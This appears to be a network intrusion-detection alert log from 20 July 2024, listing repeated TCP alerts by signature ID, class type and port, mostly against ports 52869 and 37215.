                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.090902
                      SID:2025132
                      Source Port:37696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.671215
                      SID:2027339
                      Source Port:42194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.489563
                      SID:2027339
                      Source Port:43520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.057728
                      SID:2829579
                      Source Port:34020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.656963
                      SID:2027339
                      Source Port:40824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.143690
                      SID:2831300
                      Source Port:52188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:06.477726
                      SID:2025132
                      Source Port:35428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.118041
                      SID:2027339
                      Source Port:51140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.083161
                      SID:2025132
                      Source Port:52478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2829579
                      Source Port:41168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.196522
                      SID:2831300
                      Source Port:57156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.772213
                      SID:2025132
                      Source Port:57978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.354421
                      SID:2027339
                      Source Port:60566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132103
                      SID:2829579
                      Source Port:48670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.032492
                      SID:2829579
                      Source Port:53624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.891763
                      SID:2831300
                      Source Port:43436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.370068
                      SID:2027339
                      Source Port:43534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2835222
                      Source Port:33566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2835222
                      Source Port:47214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.120513
                      SID:2027339
                      Source Port:36432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2835222
                      Source Port:45678
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.813695
                      SID:2831300
                      Source Port:42064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.517722
                      SID:2025132
                      Source Port:37782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.321965
                      SID:2835222
                      Source Port:57874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.466150
                      SID:2025132
                      Source Port:58916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.985200
                      SID:2027339
                      Source Port:48740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.691384
                      SID:2027339
                      Source Port:46394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.632123
                      SID:2025132
                      Source Port:37554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.063335
                      SID:2831300
                      Source Port:45256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.935242
                      SID:2027339
                      Source Port:45436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.660067
                      SID:2829579
                      Source Port:52356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312736
                      SID:2027339
                      Source Port:49186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.631749
                      SID:2027339
                      Source Port:54194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.262010
                      SID:2025132
                      Source Port:38122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.843278
                      SID:2831300
                      Source Port:50424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2835222
                      Source Port:59652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.070705
                      SID:2027339
                      Source Port:34608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.802130
                      SID:2027339
                      Source Port:57742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2835222
                      Source Port:57860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2835222
                      Source Port:34386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.030115
                      SID:2025132
                      Source Port:41490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.741351
                      SID:2027339
                      Source Port:42866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.879276
                      SID:2027339
                      Source Port:60162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2835222
                      Source Port:60802
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.036130
                      SID:2025132
                      Source Port:43370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.191389
                      SID:2835222
                      Source Port:56072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.053251
                      SID:2831300
                      Source Port:33236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.415157
                      SID:2027339
                      Source Port:33562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2835222
                      Source Port:50070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.602024
                      SID:2027339
                      Source Port:52422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.525128
                      SID:2025132
                      Source Port:47322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.197088
                      SID:2831300
                      Source Port:55986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.796791
                      SID:2027339
                      Source Port:57286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.444817
                      SID:2025132
                      Source Port:54294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.940882
                      SID:2025132
                      Source Port:50980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.011895
                      SID:2025132
                      Source Port:50016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:09.237639
                      SID:2831300
                      Source Port:56754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.427882
                      SID:2831300
                      Source Port:37342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:02.570955
                      SID:2027339
                      Source Port:51478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.291616
                      SID:2835222
                      Source Port:39466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.931855
                      SID:2831300
                      Source Port:46010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.053061
                      SID:2829579
                      Source Port:38084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2835222
                      Source Port:32936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.789203
                      SID:2025132
                      Source Port:48232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.161566
                      SID:2025132
                      Source Port:47924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:26.734319
                      SID:2025132
                      Source Port:51386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.594888
                      SID:2027339
                      Source Port:41116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.021834
                      SID:2027339
                      Source Port:53978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.453936
                      SID:2027339
                      Source Port:57814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314906
                      SID:2027339
                      Source Port:57786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.201622
                      SID:2829579
                      Source Port:36396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.747994
                      SID:2025132
                      Source Port:52954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.915367
                      SID:2025132
                      Source Port:42506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.553792
                      SID:2027339
                      Source Port:35074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.034562
                      SID:2835222
                      Source Port:48106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634165
                      SID:2829579
                      Source Port:34358
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113055
                      SID:2835222
                      Source Port:40466
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.780168
                      SID:2027339
                      Source Port:33652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.649912
                      SID:2835222
                      Source Port:50062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.891763
                      SID:2025132
                      Source Port:48814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220899
                      SID:2835222
                      Source Port:48734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2829579
                      Source Port:46162
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2829579
                      Source Port:45996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.978712
                      SID:2025132
                      Source Port:33088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2835222
                      Source Port:58386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.962388
                      SID:2025132
                      Source Port:59576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.946258
                      SID:2027339
                      Source Port:54036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.662837
                      SID:2831300
                      Source Port:55922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.571946
                      SID:2831300
                      Source Port:46826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.611391
                      SID:2831300
                      Source Port:48150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.259207
                      SID:2025132
                      Source Port:49352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.486621
                      SID:2831300
                      Source Port:33156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.479730
                      SID:2027339
                      Source Port:46728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.111220
                      SID:2027339
                      Source Port:49062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.609595
                      SID:2025132
                      Source Port:33306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:00.328412
                      SID:2027339
                      Source Port:40100
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2835222
                      Source Port:46510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.515976
                      SID:2025132
                      Source Port:60950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:34.610209
                      SID:2831300
                      Source Port:53550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.331820
                      SID:2027339
                      Source Port:36730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2835222
                      Source Port:45982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.209629
                      SID:2831300
                      Source Port:55768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.185032
                      SID:2829579
                      Source Port:36304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982478
                      SID:2829579
                      Source Port:46772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.580798
                      SID:2025132
                      Source Port:44132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.403723
                      SID:2831300
                      Source Port:53572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.222254
                      SID:2835222
                      Source Port:34142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.033018
                      SID:2025132
                      Source Port:45276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.633635
                      SID:2835222
                      Source Port:53564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.925226
                      SID:2025132
                      Source Port:54556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.098209
                      SID:2829579
                      Source Port:49382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.766696
                      SID:2027339
                      Source Port:57578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.863393
                      SID:2027339
                      Source Port:48716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.550538
                      SID:2027339
                      Source Port:38384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.084135
                      SID:2027339
                      Source Port:36338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.476638
                      SID:2831300
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.904524
                      SID:2835222
                      Source Port:47078
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.951975
                      SID:2829579
                      Source Port:43410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.154049
                      SID:2027339
                      Source Port:58122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.829737
                      SID:2027339
                      Source Port:35970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.883172
                      SID:2829579
                      Source Port:36552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816294
                      SID:2835222
                      Source Port:46590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.432263
                      SID:2027339
                      Source Port:38040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.856443
                      SID:2027339
                      Source Port:44526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2829579
                      Source Port:47872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.331150
                      SID:2829579
                      Source Port:41418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.673065
                      SID:2831300
                      Source Port:36994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.611391
                      SID:2027339
                      Source Port:49644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2835222
                      Source Port:47392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.668312
                      SID:2025132
                      Source Port:39408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.020551
                      SID:2025132
                      Source Port:46324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.274813
                      SID:2027339
                      Source Port:60748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.762943
                      SID:2831300
                      Source Port:45962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.811941
                      SID:2027339
                      Source Port:43366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.572517
                      SID:2027339
                      Source Port:45208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.620788
                      SID:2027339
                      Source Port:57014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.228425
                      SID:2025132
                      Source Port:55586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.204975
                      SID:2835222
                      Source Port:48742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591832
                      SID:2831300
                      Source Port:45912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.749294
                      SID:2831300
                      Source Port:56020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.595910
                      SID:2025132
                      Source Port:47002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.331701
                      SID:2027339
                      Source Port:50740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.606848
                      SID:2831300
                      Source Port:53660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.175511
                      SID:2025132
                      Source Port:45520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2835222
                      Source Port:35438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.030683
                      SID:2025132
                      Source Port:56748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.891313
                      SID:2027339
                      Source Port:49330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.432917
                      SID:2025132
                      Source Port:38766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.557694
                      SID:2027339
                      Source Port:53706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.023698
                      SID:2027339
                      Source Port:56202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.455725
                      SID:2027339
                      Source Port:39524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.484620
                      SID:2027339
                      Source Port:41228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.973966
                      SID:2027339
                      Source Port:33896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:19.406496
                      SID:2027339
                      Source Port:48398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.700204
                      SID:2027339
                      Source Port:38574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.258403
                      SID:2025132
                      Source Port:41176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.099799
                      SID:2025132
                      Source Port:54386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.164492
                      SID:2027339
                      Source Port:48656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.290281
                      SID:2027339
                      Source Port:35222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.100971
                      SID:2835222
                      Source Port:39282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2835222
                      Source Port:43708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.626717
                      SID:2027339
                      Source Port:33640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.238000
                      SID:2025132
                      Source Port:38464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.062724
                      SID:2831300
                      Source Port:55200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.392094
                      SID:2025132
                      Source Port:36884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.533243
                      SID:2027339
                      Source Port:44868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.585824
                      SID:2027339
                      Source Port:37250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.133950
                      SID:2025132
                      Source Port:39136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.079114
                      SID:2829579
                      Source Port:35484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.549014
                      SID:2025132
                      Source Port:60312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:56.324972
                      SID:2027339
                      Source Port:46594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.291967
                      SID:2831300
                      Source Port:57042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.912435
                      SID:2025132
                      Source Port:55434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.585790
                      SID:2027339
                      Source Port:58538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045144
                      SID:2829579
                      Source Port:40918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.462291
                      SID:2831300
                      Source Port:39952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.464786
                      SID:2027339
                      Source Port:52634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.903232
                      SID:2831300
                      Source Port:54976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.202290
                      SID:2027339
                      Source Port:33930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634077
                      SID:2829579
                      Source Port:35526
                      Destination Port:37215
                      Protocol:TCP
